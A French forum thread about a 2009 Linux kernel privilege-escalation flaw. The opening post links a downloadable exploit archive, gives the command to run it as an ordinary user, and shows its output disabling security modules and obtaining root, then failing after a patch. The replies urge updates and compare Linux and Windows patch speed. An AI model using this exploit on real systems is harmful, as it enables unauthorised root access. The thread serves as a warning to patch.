Faille de sécurité sur le Kernel Linux

Une nouvelle faille Linux plus que critique a fait son apparition en fin de semaine derniere.

Cette faille a été découverte par deux membres du Google Security Team (Tavis Ormandy et Julien Tinnes).

Elle permet de d'élever les privilèges d'un utilisateur en lui donnant l'accès root.

Pour ceux qui veulent tester, vous pouvez télécharger l'exploit suivant :

http://grsecurity.net/~spender/wunderbar_emporium.tgz

Il a été créé et mis a disposition par l'auteur de grsec.

Le fonctionnement est assez simple, il suffit de lancer la commande suivante avec un utilisateur système lambda :

# ./wunderbar_emporium.sh

[+] Personality set to: PER_SVR4

I: caps.c: Limited capabilities successfully to CAP_SYS_NICE.

I: caps.c: Dropping root privileges.

I: caps.c: Limited capabilities successfully to CAP_SYS_NICE.

[+] MAPPED ZERO PAGE!

[+] Resolved selinux_enforcing to 0xc08653bc

[+] Resolved selinux_enabled to 0xc08653b8

[+] Resolved apparmor_enabled to 0xc069fd84

[+] Resolved apparmor_complain to 0xc0866fb8

[+] Resolved apparmor_audit to 0xc0866fc0

[+] Resolved apparmor_logsyscall to 0xc0866fc4

[+] Resolved security_ops to 0xc0863b60

[+] Resolved default_security_ops to 0xc069eb40

[+] Resolved sel_read_enforce to 0xc0293420

[+] Resolved audit_enabled to 0xc0822564

[+] got ring0!

[+] detected 2.6 style 8k stacks

[+] Disabled security of : LSM

[+] Got root!

#

#

# bash

Autant dire que la moindre faille permettant l'exécution de code peut rendre votre machine / serveur compromis.

Une fois le Kernel patché, l'exploitation de la faille n'est plus possible :

# ./wunderbar_emporium.sh

[+] Personality set to: PER_SVR4

Pulseaudio does not exist!

dans 3 jours les mises à jour seront disponible et on en parlera plus

c'est ca qu'est bien avec linux, les failles sont corrigées rapidement, contrairement à windows ou fiat attendre 3mois lol

La faille est deja corrigé, du moins il y a un patch, j'ai mis a jour les serveurs de ForumFr ce matin :smile2:

Je tenais tout de même a faire cette news pour que les utilisateurs ne s'y connaissant pas n'oublient pas de faire leur mises a jour !

Mes 2 exemples correspondent a l'avant et l'apres ma mise a jour en 2.6.30.5

j'ai l'impression que mon ordi a quelque kernel de retard oO

en tout cas merci pour cette info, ce soir j'ai plusieurs serveurs à mettre à jour :smile2:

c'est ca qu'est bien avec linux, les failles sont corrigées rapidement, contrairement à windows ou fiat attendre 3mois lol

3 mois ? Je sais pas ou tu as eu ces chiffres mon amis mais à ce que je sache,

les bugs vista n'ont été corrigé qu'après 1 an et demi via le service pack 1.... et les drivers, il en manquait un packet pendant plus de 9 mois !

T'es vachement optimiste xD

Y'a bug et bug, les bugs vraiment critiques sont corrigés assez rapidement, en règle générale :blush:

3 mois ? Je sais pas ou tu as eu ces chiffres mon amis mais à ce que je sache,

les bugs vista n'ont été corrigé qu'après 1 an et demi via le service pack 1.... et les drivers, il en manquait un packet pendant plus de 9 mois !

T'es vachement optimiste xD

j'ai pas voulu être trop méchant avec windaube :blush:

mais je sais pas combien de temps il mettent lol je sais que ca se compte en mois

je tourne sous linux donc raf des mises à jour merdique de microsoft XD